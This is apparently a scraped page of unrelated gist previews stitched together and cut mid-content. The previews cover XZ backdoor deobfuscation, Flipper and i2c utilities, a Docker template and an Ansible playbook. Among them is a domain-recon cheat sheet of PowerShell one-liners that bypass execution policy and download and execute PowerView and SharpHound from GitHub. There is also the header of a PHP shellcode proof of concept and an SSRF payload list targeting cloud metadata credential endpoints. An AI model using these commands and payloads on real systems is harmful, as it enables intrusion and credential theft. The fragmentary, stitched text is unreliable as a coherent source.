| XZ Backdoor symbol deobfuscation. Updated as i make progress |
| 0810 b' from ' | |
| 0678 b' ssh2' | |
| 00d8 b'%.48s:%.48s():%d (pid=%ld)\x00' | |
| 0708 b'%s' | |
| 0108 b'/usr/sbin/sshd\x00' | |
| 0870 b'Accepted password for ' | |
| 01a0 b'Accepted publickey for ' | |
| 0c40 b'BN_bin2bn\x00' | |
| 06d0 b'BN_bn2bin\x00' | |
| 0958 b'BN_dup\x00' |
This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.
On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that
| #!/usr/bin/env python | |
| # Find the raw bitstring from a captured Flipper RAW .sub file. | |
| # Must provide the bitlength in ms, and the allowable error which can be tolerated. | |
| import re | |
| import sys | |
| import math | |
| filename = sys.argv[1] |
| @import Darwin; | |
| @import Foundation; | |
| @import IOKit; | |
| // clang -fmodules -o i2cwrite i2cwrite.m && ./i2cwrite | |
| typedef CFTypeRef IOAVServiceRef; | |
| extern IOAVServiceRef IOAVServiceCreate(CFAllocatorRef allocator); | |
| extern IOAVServiceRef IOAVServiceCreateWithService(CFAllocatorRef allocator, io_service_t service); |
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
| <?php | |
| /* | |
| Updated version, 2016-12-02: fixed shellcode so it *actually* works on QEMU | |
| usermode emulation (seems I pushed an old version), and removed debug output. | |
| ------------------------- | |
| NB: THIS PoC ONLY WORKS IN QEMU USERMODE EMULATION! | |
| If anyone wants to fix this, go ahead (no pun intended). | |
| However, I don't have a vulnerable product and am unwilling to acquire one. |
| docker run \ | |
| --name {{printf "%q" .Name}} \ | |
| {{- with .HostConfig}} | |
| {{- if .Privileged}} | |
| --privileged \ | |
| {{- end}} | |
| {{- if .AutoRemove}} | |
| --rm \ | |
| {{- end}} | |
| {{- if .Runtime}} |
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
| # Idempotent way to build a /etc/hosts file with Ansible using your Ansible hosts inventory for a source. | |
| # Will include all hosts the playbook is run on. | |
| # Inspired from http://xmeblog.blogspot.com/2013/06/ansible-dynamicaly-update-etchosts.html | |
| - name: "Build hosts file" | |
| lineinfile: dest=/etc/hosts regexp='.*{{ item }}$' line="{{ hostvars[item].ansible_default_ipv4.address }} {{item}}" state=present | |
| when: hostvars[item].ansible_default_ipv4.address is defined | |
| with_items: groups['all'] |
